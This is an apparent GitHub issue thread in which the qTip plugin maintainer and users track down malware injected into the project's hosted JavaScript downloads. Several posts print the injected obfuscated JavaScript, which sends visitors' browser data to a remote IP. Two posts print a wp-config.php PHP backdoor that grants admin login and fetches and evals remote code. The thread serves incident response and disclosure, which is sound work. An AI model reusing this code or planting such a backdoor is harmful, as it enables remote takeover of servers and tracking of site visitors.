I've disabled all downloads of qTip, qTip2 and Simpletip on my site whilst this is dealt with. Seems an old Wordpress install has been a security vulnerability and infected nearly all JS files on my site... damn it! Thanks for the link and bug report on this no1youknowz, very much appreciated.

I'll update this bug with an update once all the infections are cleared and the site is good to go again. Until then the GitHub code branch is clean as a whistle for those who want to download and use qTip2 :)

Didn't know this was the place for the issue so I spoke to no1youknowz on irc who posted it here.

To provide some more info so developers or sysadmins can find answers they are looking for. (I tried and found no answers for this url: http://91.196.216.64/s.php, but i found the wordpress thread posted above with the btt.php-file hack.)

This is how a request looks like:
GET http: //91.196.216.64/s.php?ref=&cls=32&sw=1280&sh=1024&dc=utf-8&lc=http://example.com/index.php?p=2&&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%207.0%3B%20Windows%20NT%206.1%3B%20Trident/4.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET%20CLR%201.1.4322%29 HTTP/1.1

The request was generated through this file: jquery.qtip-1.0.0.min.js
I guess one can delete this entire line in this file:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document_0xdc8d[1];if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document_0xdc8d[10];js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document_0xdc8d[21][0];head_0xdc8d[22];} ;

The offending scripts have been removed as well as the Wordpress blog I suspect caused the vulnerability. Cheers for all the information guys, very much appreciated. I've now got a cronjob setup that checks for changes to common scripts and several standard hacking techniques such as the base64_encode trick, so I'll be alerted pretty promptly in future if this happens again... but let's hope it never does now.

So someone deliberately put this script there to collect information?

Yes, though it looks like the information itself was rather harmless i..e. user agent string along with your IP. Though obviously that doesn't change the fact its still a breach of privacy and trust on my part. Unfortunately there isn't much you can do except proactively remove these things ASAP if/when they happen. Hopefully this will be the last of these occurences now the security hole has been fixed.

We just had the same Problem with a really big customer, and we found out because some visitors reported a Trojan Warning on the Website.

It was exactly the same problem as no1youknowz reported.

But it looks like that the Code not only sends some Metainfos, if the Metainfos are correct it downloads some other Exploits, check here:

http://www.malekal.com/2011/12/21/91-196-216-64-hacks-de-site-fr-pour-le-virus-gendarmerie/

I would recommend that you write a news entry on the qTip Frontpage that every developer should check his code!

Oh and I just saw that there is no SHA or MD5 hash on the Website. I also strongly suggest du add a MD5 hash to the File so that People can check the Code for integrity

Actually there's been a notice up about this on the download page for a while, except I noticed after you posted this I'd forgot to re-build my page cache so it wasn't showing correctly... apologies for this, and the inconvenience caused to your customer.

Unfortunately providing an MD5 or SHA1 hash isn't that easy, since the download page allows you to configure your download and chhose what plugins to include etc. I've been looking into this for a while but it's problematic on the back-end to generate before the required package combination has been created (which it isn't until requested by the user).

This issue is still present in the file http://craigsworks.com/projects/qtip2/packages/latest/jquery.qtip.js

Seems like it is back yes. The last line of the file and it is a new one.

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5]_0x4470[4]){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]](new RegExp%28_0x4470[7]+_0xa064x5%28_0xa064x3%29+_0x4470[7],_0x4470[8]%29,_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3]_0x4470[2],0,{}));

Decodes the bytestring to utf8:
9=1.d('5');b(!9){8=1.j;4=6(1.i);7=6(g.k);a 2=1.e('c');2.f='5';2.h='w://t.u.l.v/s.r?q='+4+'&m='+8+'&n='+7;a 3=1.o('3')[0];3.p(2)},|,split,|document|js|head|hghjhjhjg|dgllhguk|escape|ugkkjkj|hghjghjhjgjh|element|var|if|script|getElementById|createElement|id|navigator|src|referrer|location|userAgent|216|lc|ua|getElementsByTagName|appendChild|ref|php||91|196|64|http,replace,\w+\b,g,

Seems a bit more complicated this time. But sends less info to the russian server.
I also found your web page is infected this time.

Example of how the requests looks like when this script is running:

http://91.196.216.64/s.php?ref=&lc=http://craigsworks.com/projects/qtip2/&ua=Mozilla/5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_7_2%29%20AppleWebKit/534.52.7%20%28KHTML%2C%20like%20Gecko%29%20Version/5.1.2%20Safari/534.52.7

All of the files is infected with the same code:
http://craigsworks.com/projects/qtip2/packages/latest/ and many more files in the other directories too.

Looks like the security hole wasn't plugged after all. I'm investigating how the malicious code is being injected, but until the4n I'm disabling all native downloads from my server. Please use this GitHub repository for grabbing the code and do not hotlink from the latest repository files.

Also, if anyone has any expertise in tracking these types of vulnerability down drop me a line, I really want to get this sorted out ASAP.

Any luck figuring out where the hole came from on this? I have a server with ~20 websites and it has spread like wildfire throughout a lot of my js files. It seems to prefer certain theme js files and analyticator js files but it's not contained to just those. I can only go into the js files and get rid of the code but it keeps spreading itself. Help appreciated!

Unfortunately not... I've pretty much disabled all custom scripts at this point and I'll be re-enabling them one-by-one over the next few weeks to see which of them is causing the vulnerability! Do you have any Wordpress installs active?

I'm not sure which WP installs are active if any. This is my partners server and I was just trying to do a bit of research for him. I'll be in contact with him later and ask, and then respond here. What's weird is that we can get rid of some of the code from the .js files and it will be fine days later, but other files that we rid of code will just become corrupt the next day again.

Could this possibly be the issue? It is a different var string at the beginning but pretty much the same code.
http://www.formtools.org/wordpress/?p=599

Looks like that could be it. I had a wordpress site active on my site without realising which likely cause the issue for me as well, but want to make sure before I re-enable anything, so I'll monitor the site for the next week or so and see if there's a re-occurrence and keep this thread updated.

I used the code above to remove the line of the files that contains that kind of code:
grep -lr _0x4470 . | xargs sed -i '/_0x4470/d'

I hope it helps.

Did you have already any luck in finding out the root cause / hole by which they could inject this code in all *.js files? I had the same issue on my servers, everything is cleaned and updated now, but still - not very sure if it is really fixed now.

@Thuener, @WrathsU and @Craga89, thanks a lot all for sharing your experience and code snippets!

Hey Guys, I just got an email from a fellow by the name of "Tauras Paliulis", whose informed me where the vurnerability likely lies! See below for details:

Hi, I found out the problem. check out the file wp-config.php for the code below. With that 'pingnow=eval' they executing the php code which adds that ugly .js line.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == 'f4b9ec30ad9f68f89b29639786cb62ef'){
        if ($_GET['pingnow']== 'login'){
            $user_login = 'admin';
            $user = get_userdatabylogin($user_login);
            $user_id = $user->ID;
            wp_set_current_user($user_id, $user_login);
            wp_set_auth_cookie($user_id);
            do_action('wp_login', $user_login);
        }
        if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
}}}

Since I've disabled the Wordpress Blog on my site I'm going to mark this as resolved. Thanks to everyone for all the work dont to track this vulnerability down!

I found this code too.
Em 19/01/2012 20:42, "Craig Michael Thompson" <
reply@reply.github.com>
escreveu:

Hi,
Didn't wanted to signup to github but found out, that You have a virus.
I found out the problem. check out the file wp-config.php for the code:

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == 'f4b9ec30ad9f68f89b29639786cb62ef'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

With that 'pingnow=eval' they executing the php code which adds that
ugly .js line.

---

Reply to this email directly or view it on GitHub:
#286 (comment)

http://paste.pocoo.org/show/539577/ thats actually the code from the version of december